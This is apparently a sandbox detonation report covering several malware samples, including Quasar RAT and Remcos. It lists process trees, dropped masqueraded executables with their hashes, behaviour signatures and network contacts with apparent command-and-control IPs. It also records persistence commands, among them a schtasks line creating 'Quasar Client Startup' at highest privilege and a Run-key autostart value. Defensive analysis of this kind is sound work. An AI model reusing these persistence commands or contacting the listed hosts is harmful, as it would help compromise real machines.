"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6a40fb0b-9503-440c-b053-ed4004efd2ff.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\358be680-2edf-4b05-9c24-bcc49573f997.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9d6ae010-d3de-4322-b7bf-6677de9dfa0a.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6333a880-14b3-4f87-8e0c-51f77801efe1.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9df513f0-9eab-4cfb-928d-280ba06f91cb.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bf4002af-6d93-4c21-97ce-fba11d964f3b.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\023f77f7-844f-45b0-905c-a371be847a67.vbs"
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
C:\Windows\Speech\Engines\Lexicon\RuntimeBroker.exe
Network
| Country | Destination | Domain | Proto |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
Files
memory/2180-0-0x00007FFFDCC23000-0x00007FFFDCC25000-memory.dmp
memory/2180-1-0x0000000000CB0000-0x0000000000E52000-memory.dmp
memory/2180-2-0x00007FFFDCC20000-0x00007FFFDD6E1000-memory.dmp
memory/2180-7-0x0000000002FB0000-0x0000000002FB8000-memory.dmp
memory/2180-11-0x0000000002FF0000-0x0000000002FFC000-memory.dmp
memory/2180-17-0x000000001BB90000-0x000000001BB9C000-memory.dmp
memory/2180-16-0x000000001BB80000-0x000000001BB8A000-memory.dmp
memory/2180-15-0x000000001BB70000-0x000000001BB78000-memory.dmp
memory/2180-14-0x000000001BB60000-0x000000001BB68000-memory.dmp
memory/2180-13-0x000000001BB40000-0x000000001BB4E000-memory.dmp
memory/2180-12-0x0000000003000000-0x000000000300A000-memory.dmp
memory/2180-10-0x0000000002FE0000-0x0000000002FEC000-memory.dmp
memory/2180-9-0x0000000002FD0000-0x0000000002FD8000-memory.dmp
memory/2180-8-0x0000000002FC0000-0x0000000002FD0000-memory.dmp
memory/2180-6-0x0000000002F90000-0x0000000002FA6000-memory.dmp
memory/2180-5-0x0000000002F80000-0x0000000002F90000-memory.dmp
memory/2180-4-0x000000001BAF0000-0x000000001BB40000-memory.dmp
memory/2180-3-0x0000000002F50000-0x0000000002F6C000-memory.dmp
C:\Users\Public\Pictures\Idle.exe
| MD5 | 8b03d1f60bdf0b6465c0623109e7269e |
| SHA1 | 33fb1f09f53ca182e1112ed973fce8fa97e4398f |
| SHA256 | 1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf |
| SHA512 | 8c79bf16fdce864799bb6893565aa06f35737f91897537f08129bfe842ad46f39f4081dcc59760df59e416af3ec848fd2dec179d42900defad7d94b4678f2de0 |
C:\d25f591a00514bc9ba8441\RuntimeBroker.exe
| MD5 | b4a7ffa597431472f1196f0d244fdfa1 |
| SHA1 | 9787d0f1dffca7a2d3d3a04b7b3f9cc055190039 |
| SHA256 | 12a93931e6670cd16b26b8aaaf6b9c99a181ed1781cbb8af9e309bfd8a1f6d92 |
| SHA512 | 3ddec53995b68b6d4f071bea31ca3403006929a5b8169f89819a9b2ecbbf30a6bd659f4d38302c2a0bd26d9c1be33ecbb1201245e57571a6a7cf75e148ed35e4 |
C:\Program Files\edge_BITS_4732_595216890\dllhost.exe
| MD5 | c56e5784a7e11766cbc57430d7685115 |
| SHA1 | ab802a3d90f6728b38d255870b9feff0e55e5ae3 |
| SHA256 | 869890cc0d29ee7b63b8f2826ecd4febc9046d1b783e80512e710c5798a66224 |
| SHA512 | 773a9c7cc073759044b7a29a630ea3f9d78576dfd908c04bae1f464d4db9fbda61542275b3c7bbb8c144574a91cd2bf0de897ebbd1675c60ba5714cfe8238949 |
C:\7e20f84d5244aba7145631d4073af8\RuntimeBroker.exe
| MD5 | 3832310c7b6ed8e78cfa29000e158fb3 |
| SHA1 | acf5c18fd29dd3337a8baeabd92f4471e5435505 |
| SHA256 | 06663ed3c24b80c705519ff8dea59148160984c07239df59811e63e4b92163da |
| SHA512 | efa34c62a903db38628d62e9054a6a540e94fb719db6dd52aaae9d7b90db8792047da0b8810b57c88afd5ade4b4d18828b70a12064c0157272de0a0d49b9582c |
C:\Recovery\WindowsRE\csrss.exe
| MD5 | 2bcea9d2c346ba84574b8331bce37087 |
| SHA1 | b4c7612844243e564066fd26f04df4e5a0a480b1 |
| SHA256 | 7d7f907400a3c287206073b99b545e96081232768136c9f711c58bea6b33d44c |
| SHA512 | cb70e056815353aaef96d21beb4da2c3c100d57f2ba5c4271365b3e985e7fb590698e6e8b3976d60eae41d8fc5bf2ea2c9f5e4d34d851f540891feb79ca68a67 |
memory/2180-201-0x00007FFFDCC23000-0x00007FFFDCC25000-memory.dmp
C:\Recovery\WindowsRE\RuntimeBroker.exe
| MD5 | db8f82f3d8973d32dd8701ac6e2954b5 |
| SHA1 | 851e8fcd38ea62a46f44c4fa33bebca5b59be664 |
| SHA256 | c2ffcb38c5f667900d6a178bba5058d8cc888c5efa7aeadd1c8ce9de2ebaa95e |
| SHA512 | 83d2278f3b987293cab71bb5d24acd7b4ff203377a48a82c5d1fce7234f5e4c2bb785887978f3657433dd2cfe93bf44a41a212e021ae32bff9e9c94198f8ec52 |
memory/2180-213-0x00007FFFDCC20000-0x00007FFFDD6E1000-memory.dmp
C:\d25f591a00514bc9ba8441\sihost.exe
| MD5 | 53cff85048d32a94637e8115a6f122d0 |
| SHA1 | 80abea3fa189da68c1639ea0f1ba58adf87b6b94 |
| SHA256 | 6fae27b1af247f9bf0ddfad3125bc5913540c26b39061e57113f506a3893e28c |
| SHA512 | 31951295ad8c360232c2201bd3654f8cfc6160ea485311a47d34b796c44e24b26b448da7f89cf890aec6e0b39567408d2097e5cac2b472626efc5c48092bb09f |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2wcp2y1.ewv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4936-240-0x0000024969310000-0x0000024969332000-memory.dmp
memory/2180-259-0x00007FFFDCC20000-0x00007FFFDD6E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XeGdH0U8sJ.bat
| MD5 | 3ab5ba471170ab2e56e14119abedb58e |
| SHA1 | f575ec5fae41649ebf8207c080817c9a3074a3bc |
| SHA256 | bbd58dd35b621657afbf9e758c9b0f3b6744f1d39866086c3e625a8aaaa12e9a |
| SHA512 | f0c12d2586b37660d04d97eb4a58814ac68779e922107ef4782e81f42e55f4adfef2547fbdc56b0fca7717d2952276db4026c96c494b8c3161708c44bdbdc25f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 091f20bbaff3637ace005fce1590be7b |
| SHA1 | 00d1ef232fc560231ff81adc227a8f2918235a29 |
| SHA256 | bd50b50b5e08067840cf1e6bb16f3ed0242649d826544899056db26876dec9fe |
| SHA512 | ebc04d7de6bcbd6505c60432c6455bde985ac422cbda875ef5c1dd6ef44155ec0d43a882dd793e692d3723a257e3d12c48ac8c0dad7c21a99d446d4b3b257890 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ceb796de20c8360e1e53623d78696e8a |
| SHA1 | 52e20d1bb718b5e04290816c3c740d8f89265bcb |
| SHA256 | cdf217f7e76215d14186a36614f8d2bd6f911869af5c12d98827ec42734ce321 |
| SHA512 | 2d9f010240f49f4ea4537ece426edeccf8f6b1f2013bfb5e5e8412bc54993043e101f205ed5ca93f26d77de3cce1ab7620b7f97792df06d6c803695f9baaf869 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e8e7675df15697eee65b731b90f33a5f |
| SHA1 | 8fe1308e032c5cb61b8ea50672fd650889cecdcd |
| SHA256 | 656a10810af26e008c2c5d4748b4a476b97b9fd5ef7837ae197feff6ec00b932 |
| SHA512 | fed3aa124a90998c734d36397f7fa6e26973bbeaa2c11b999ee05b0fb2378473b14765ca606f021c2f778613ce61f3a1c6836e955b7c6b192a7774973a945992 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 566ef902c25833fe5f7f4484509fe364 |
| SHA1 | f8ba6651e7e4c64270e95aac690ad758fa3fc7f8 |
| SHA256 | 28265aaf259c60ae208b025f4c6b317c0799154b5d40d650bf44ef09f4805514 |
| SHA512 | b2c696820b775c0705884f606b4ac464d75d8d5e415bee2fb1e68d07ca288c953936d9286f277082fc11fbae24748c6a872f0be540be37190f0383c7b16820a3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f3d606f9a5f1201bfc1f01c54e842c4 |
| SHA1 | f1917e50b557b135953ecbe63e1fc1e675b541f1 |
| SHA256 | dcc09d3b5b17ef60cb35e4148230306cdcd68d18d18a39fd5fe220c34997a32a |
| SHA512 | d85e1e1b4a552a8cdd21c4195a2ea082d3fcb40907d2a6a0ceb297f32defd1fba17d3b54dc954c26b3b731bc179bee5cfc011de3c667af47cdbe289b30fdfb38 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1f3a4f1a0ec7141a2b9d52de694b5b94 |
| SHA1 | 818521ae654b04c97a8510dd452046a18eab00a0 |
| SHA256 | a7eb5ae5bbcd9b72aa81795071ba0dc8485e6f2f942f816cb192b3db33acbac3 |
| SHA512 | d00ea8136fa8ced7733d712af781270f7046ac07c48ccdd5ab22d5a29775b98e5f3aac6b6b58f0bf103d6af1ab7b4fa43aee873f91750fd34668c0fbb2082ef4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a5d93882341ce023d4569907c3bb0def |
| SHA1 | db0998ab671abb543a7ac78596c0b95743a9a2c8 |
| SHA256 | c3ea7d8d4ac21adbe8c93e10729367b0b7c3477e7758596609c8e25e45baaa78 |
| SHA512 | 7bf5716c96d93da7d37bbedb9623c9ae2860ac7b1a0e9310cbee0962556705f8876aebdabb9820f1f1ed37e504e002f24507a23db302d0e180bb45092520cc7f |
C:\Users\Admin\AppData\Local\Temp\c0c5fc13-d501-4833-9b9b-2f080c1c8aaa.vbs
| MD5 | dbfcce4076e8ff82286fe0d4ec14e327 |
| SHA1 | 51ff3b3e7553284fc14f6f4eb52eae48bfe01223 |
| SHA256 | 7474a8bc8be3589e71ef8f54095860c2d32f41caa8746a295b74ba50fb7cd60e |
| SHA512 | 65e3c682ea3e7bcf7133576566e1a52a0a715bbb40d3bb26936b26983077401cbfa8a6cfee1c7e122704cf1e054716910c1865b44a6a789c9565122ac3a8ae1e |
C:\Users\Admin\AppData\Local\Temp\5a79a36d-291c-4c41-a4e1-ce73bfd5be23.vbs
| MD5 | 22d515b4a64ce57c1c1c31a9b64e113a |
| SHA1 | 8b383c0ee29c26de3b9783ef85f48e06c92427a6 |
| SHA256 | 59e60ca1f17345edc462be9e4429bf29563f87730fc2fa37f22d3725c0e4f17c |
| SHA512 | 5d51c57e787ec356a3dd4647595e500b74637b0f56388b898dffa81ee8c9d7e5f988df037c3cd62ff3d5f474d3a5bd2c24e51143fdfb138b191260fbe73692d4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log
| MD5 | 3690a1c3b695227a38625dcf27bd6dac |
| SHA1 | c2ed91e98b120681182904fa2c7cd504e5c4b2f5 |
| SHA256 | 2ca8df156dba033c5b3ae4009e3be14dcdc6b9be53588055efd0864a1ab8ff73 |
| SHA512 | 15ebfe05c0317f844e957ac02842a60b01f00ddca981e888e547056d0e30c97829bc4a2a46ce43034b3346f7cf5406c7c41c2a830f0abc47c8d2fd2ef00cb2c1 |
C:\Users\Admin\AppData\Local\Temp\239e4973-5b62-442b-9de7-006ed6a8a33a.vbs
| MD5 | a1811be40e8ec17443497f144ecdf2c6 |
| SHA1 | 729ed8edbe42d15d598d394181b848157c7031a0 |
| SHA256 | 39229f21fb68c998531270104d905cf456bb74b97bd6045de7df102345de25c1 |
| SHA512 | c0e327dee8ec4a11c8c94cbadab52b110867ee62a15003f3adc4fa50182b27660e6cffddbce703d688ed5536ee1ec078334598c05a1f7011799d61eba2604147 |
C:\Users\Admin\AppData\Local\Temp\86e9093d-cfd8-4f3c-89b1-c4cc91329d80.vbs
| MD5 | 3b5c4d0fb412836761cf85d0a31fc9c3 |
| SHA1 | b6c452f3e8922e390ed1089b2963d9ed57dc6134 |
| SHA256 | 7d49609c68c3b3071f6ade1f4735464a18aece8bca9da0531067c38f32df8b14 |
| SHA512 | 8d2c9f7468c083015a973e9cc1d4a394d52e76418875617b4e77d03bfdb06bdc38cf23e6d544cdb69767782a9b8add1fe7c1dc6a7d61160d6dcd628a554ed709 |
C:\Users\Admin\AppData\Local\Temp\3ba6a0cf-f68f-41a4-9e7a-e7243952869a.vbs
| MD5 | ba2b74eb21d71fc714c5db526384bd2b |
| SHA1 | c15c61e3392989940572cd4cfed075480e04bcd5 |
| SHA256 | 208ea1e7031e389f37d956ed08da1ac3892ed4b2c72bbec594ae9cc8aee3c073 |
| SHA512 | 18f4cc2e4d3ba7ab18bc78f177f1a7cf747d81238c822f273c8778d037cfcd0c8ad0550f9827e434fbc5897d5dc6a8637c3bb0c06387599cee22a2e1fff86775 |
C:\Users\Admin\AppData\Local\Temp\3ec648c8-1a84-4dd5-ad79-9f0512d16478.vbs
| MD5 | 388a7990fcb69ce25e1dc4ea7d2b3ed0 |
| SHA1 | 0eb5120858f8a55f8229c7aa60d051fbdceefdde |
| SHA256 | 24c84a11b9f08da8311f69e17175d22ba59048614796a19e115a7d530cd23bdb |
| SHA512 | f3d217032edf77e17a1ceedd007f5d7edb324739d584f415733fa3ad37bac0481ea1a4b004d9c6173bc7c3a1d73d068ab552afb02e4a904685bfa9b852c2e646 |
C:\Users\Admin\AppData\Local\Temp\e263bd33ce825262c0c77aaee9ec2b40e5eedeee.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\a4c3d2b5-daef-4164-abe0-b84a7d8560d3.vbs
| MD5 | e8779d2ec891514a7300384857fc15a6 |
| SHA1 | fa4eaf918686d669f600f30d982dbb4bc744253f |
| SHA256 | 217f80116979cbca906d775772faf19dd6aa0271131a2ffeb704f67e8ae91b06 |
| SHA512 | 66a8239b529c86d5a8f4822af6746fdfd9cbaa53574a4498ae69a0e758c32e8752afc398d940a9e1f0b987a8d0162584fbc06d19a31fa511cdfa7c95027cbb2a |
C:\Users\Admin\AppData\Local\Temp\821b7e38-7e51-4bcc-a17e-12564ee68448.vbs
| MD5 | 218a452d57745303612c32c51065f137 |
| SHA1 | a25e3bdd6e65417d0d188957bf46e825661d30e1 |
| SHA256 | 345b8d81188a1e6b257ab72c16563d026ae2b388a334b2098f2d915151d967b7 |
| SHA512 | 9c1ce6da80eae453db35d7942b1b2a243a9d5a1dfe06dfc700b9db138d5b21692859d450875dac9f9b5217cb891e6a8efc49d522a986dd73346baffd1b124861 |
C:\Users\Admin\AppData\Local\Temp\aba768da-aa2e-42b0-ba71-4d52689d6e04.vbs
| MD5 | 18499dad257230cc7a24c8008c3ea79c |
| SHA1 | cd4a56ee3f8d847a2426191ea97956c351611477 |
| SHA256 | 81a97f61c3cb4cef2091a36dd15cc72d4dd95f21cfdecdeb3629b4ae486f299f |
| SHA512 | 5b1a850f7dff222c5468d134ce470899ccff9bcdfd3c5a37cb3c323a188bb31fe695e87c38003ccd9529141c0375ed94f11858d3a31408e04c87ca61177c4b62 |
C:\Users\Admin\AppData\Local\Temp\358be680-2edf-4b05-9c24-bcc49573f997.vbs
| MD5 | a4a31e821e12cecde8acfeec7e8a7a97 |
| SHA1 | cf52a699f95fc8e2a5b99da174f096f3e5e6778b |
| SHA256 | 2977946777895e90ba48a573358899eeea59b88a3f7196053c5ba1013e05404a |
| SHA512 | 3885e7e0d828d8ba4f9b96595a1e4d1bbd624ab8008870d31678fc0412f61ebb1ed9657eee35056623b3bb1bd65626bddb88700a8ed800f6e53d143812d090e0 |
C:\Users\Admin\AppData\Local\Temp\6333a880-14b3-4f87-8e0c-51f77801efe1.vbs
| MD5 | 0eed7707b6934c5b19f065ab098b2ea7 |
| SHA1 | f9fb519b395d2184bf979206ca38cae5a45ef73d |
| SHA256 | e2c219ed32e0a3aa7780d434f23cff2ca0cd7c2b54f02cb3b26b078a476c7701 |
| SHA512 | 5b4525a2afc317432263709fbfc7267e441ef4cd441ea8a659acb4e225b78b80c04f3ac31cc12ff4be28eb6c5f9c1608f33c05ed6692813cf0bf98033038ac85 |
C:\Users\Admin\AppData\Local\Temp\bf4002af-6d93-4c21-97ce-fba11d964f3b.vbs
| MD5 | 135190d89c524caa61af63b624751b4c |
| SHA1 | 7bdbca909bee9b5320d818c4a03ecb5f3c51a69f |
| SHA256 | ec7707d0ca57de6a43215a224c5ef4b9606196952b1dfb5877b335f57ad87d1f |
| SHA512 | 3a3aa29a284e9f6128c5ec29671d5940b834978017d35347b2d7f982a9ec517ecf01681224101f2265539b0d37748df7fb289a48b6e6c5df3f901a1aac129f0f |
Analysis: behavioral28
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 100 wrote to memory of 5484 | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | C:\Windows\SYSTEM32\schtasks.exe |
| PID 100 wrote to memory of 5484 | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | C:\Windows\SYSTEM32\schtasks.exe |
| PID 100 wrote to memory of 5720 | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe |
| PID 100 wrote to memory of 5720 | N/A | C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe |
| PID 5720 wrote to memory of 5816 | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | C:\Windows\SYSTEM32\schtasks.exe |
| PID 5720 wrote to memory of 5816 | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | C:\Windows\SYSTEM32\schtasks.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe
"C:\Users\Admin\AppData\Local\Temp\1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp | |
| N/A | 192.168.1.55:4782 | tcp |
Files
memory/100-0-0x00007FF91F2A3000-0x00007FF91F2A5000-memory.dmp
memory/100-1-0x00000000008D0000-0x0000000000BF4000-memory.dmp
memory/100-2-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
memory/5720-10-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
memory/100-9-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
memory/5720-11-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 35110eedb3518d1905b88025bf11b77d |
| SHA1 | c39e96cc0dcb14065984c3d3fbff331070e37feb |
| SHA256 | 1bbf7d818b40f8fa0da224e39f27829bb7d8a8bdbec66fa62cfba39cd0d6d3fd |
| SHA512 | 08a3db05d373eb18f9b86fcea5b4338bd4cf3ca60df9906873bc0eb4d2dd6bc544890d23543df9be0848647d89a14d51010a7498bf8041c6872d8af768e035d2 |
memory/5720-12-0x000000001B1F0000-0x000000001B240000-memory.dmp
memory/5720-13-0x000000001BA30000-0x000000001BAE2000-memory.dmp
memory/5720-14-0x00007FF91F2A0000-0x00007FF91FD61000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
139s
Max time network
150s
Command Line
Signatures
Remcos
Remcos family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Application = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\sbietrcl.exe" | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 440 set thread context of 3408 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe
"C:\Users\Admin\AppData\Local\Temp\1c2345047abfb5daed017769f13254053b7c8cfe14027982065835c6a4bc9aa0.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 213.183.58.19:4000 | tcp | |
| RU | 213.183.58.19:4000 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| RU | 213.183.58.19:4000 | tcp | |
| RU | 213.183.58.19:4000 | tcp | |
| RU | 213.183.58.19:4000 | tcp | |
